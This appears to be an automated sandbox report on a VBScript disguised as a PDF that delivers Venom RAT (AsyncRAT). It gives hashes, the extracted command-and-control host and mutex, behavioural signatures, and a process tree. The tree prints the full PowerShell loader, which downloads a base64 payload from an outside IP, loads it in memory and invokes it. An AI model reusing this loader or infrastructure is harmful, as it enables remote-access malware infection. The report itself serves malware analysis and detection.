Analysis
-
max time kernel
594s -
max time network
597s -
platform
windows10-1703_x64 -
resource
win10-20220812-en -
resource tags
arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system -
submitted
14-10-2022 19:13
Static task
static1
Behavioral task
behavioral1
Sample
QKWERBD01BSNAS_002_PDF.vbs
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
QKWERBD01BSNAS_002_PDF.vbs
Resource
win10-20220812-en
General
-
Target
QKWERBD01BSNAS_002_PDF.vbs
-
Size
442KB
-
MD5
ef69b45b2a116ed60277d731e42c2f0e
-
SHA1
0f1b9734dd43a034c56360e603659568ab65f91d
-
SHA256
ace37f42d21bf2768add3a41954c1b5d41f85966af20de4483498c14ac4d8a7b
-
SHA512
c2d037d408ed9a199a15ae960b53c112e2887571e87325794cf49a6f8c15af18bba380544b565d7e0f96dd68c9cda8fc416c50d595640086c1e8f31c62ac7e10
-
SSDEEP
768:De0E0B0S0Y0V0w0B0V0/i0j0+050kfF0NF0B0Z/0pP40E0X070M0Ao0I0gAOAqAn:7aW1AP4lgK
Malware Config
Extracted
http://20.7.14.99/dll/dll_ink.pdf
Extracted
asyncrat
Venom RAT 5.0.5
Venom Clients
hugh69021.duckdns.org:7555
Venom_RAT_HVNC_Mutex_Venom RAT_HVNC
-
delay
1
-
install
false
-
install_folder
%AppData%
Signatures
-
Async RAT payload 2 IoCs
resource yara_rule behavioral2/memory/5040-155-0x0000000000400000-0x0000000000416000-memory.dmp asyncrat behavioral2/memory/5040-156-0x00000000004109EE-mapping.dmp asyncrat -
Blocklisted process makes network request 2 IoCs
flow pid Process 1 2640 powershell.exe 3 2640 powershell.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\notepad.lnk powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2640 set thread context of 5040 2640 powershell.exe 70 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 2640 powershell.exe 2640 powershell.exe 2640 powershell.exe 4888 powershell.exe 4888 powershell.exe 4888 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2640 powershell.exe Token: SeDebugPrivilege 4888 powershell.exe Token: SeDebugPrivilege 5040 RegAsm.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 2196 wrote to memory of 2640 2196 WScript.exe 66 PID 2196 wrote to memory of 2640 2196 WScript.exe 66 PID 2640 wrote to memory of 4888 2640 powershell.exe 68 PID 2640 wrote to memory of 4888 2640 powershell.exe 68 PID 2640 wrote to memory of 5040 2640 powershell.exe 70 PID 2640 wrote to memory of 5040 2640 powershell.exe 70 PID 2640 wrote to memory of 5040 2640 powershell.exe 70 PID 2640 wrote to memory of 5040 2640 powershell.exe 70 PID 2640 wrote to memory of 5040 2640 powershell.exe 70 PID 2640 wrote to memory of 5040 2640 powershell.exe 70 PID 2640 wrote to memory of 5040 2640 powershell.exe 70 PID 2640 wrote to memory of 5040 2640 powershell.exe 70
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\QKWERBD01BSNAS_002_PDF.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:2196 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string((New-Object Net.WebClient).DownloadString('http://20.7.14.99/dll/dll_ink.pdf'));[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('2fc2e069481e-e589-8744-a310-1ce6957b=nekot&aidem=tla?txt.dsderpsO/o/moc.topsppa.swdldk/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth'))2⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2640 -
C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\Windows\Temp\Debug.vbs3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4888
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5040
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5f6c90ab0db80c6c3ea92556fda7273c7
SHA101d3866b1887cbb0abe9701f6b49c5dbc66a7dfa
SHA256a823c3b6f157c50315251d43db740ad37a736b967f0500e024e3a0f84192b269
SHA512aa6b71e3a8fa46702787d190e3633b1ead0f66cce81065fa2262dde59c683a7fc48846fa2b0bbe94a050564855fc7a79842f0abfa53cc3315e4c766b3c4c1fbe
-
Filesize
1KB
MD5f22ef27b8df15a4a683f1e37af74e3f8
SHA1bcd6bda432c109e199b1a0acba4da56c794509c1
SHA2566328dc368d16e4e20cd9d0859f55efb6af79a222a3e1ac53acd250e48ca75823
SHA512f02948f0692f08d3f684b665b1f470f26009cb7199520d96191ce79c8b5b0bd878d1a1e4e9ee0f0b8641893717f20d0e3fd5d8fb1695e1ed7af959cdc5491a3c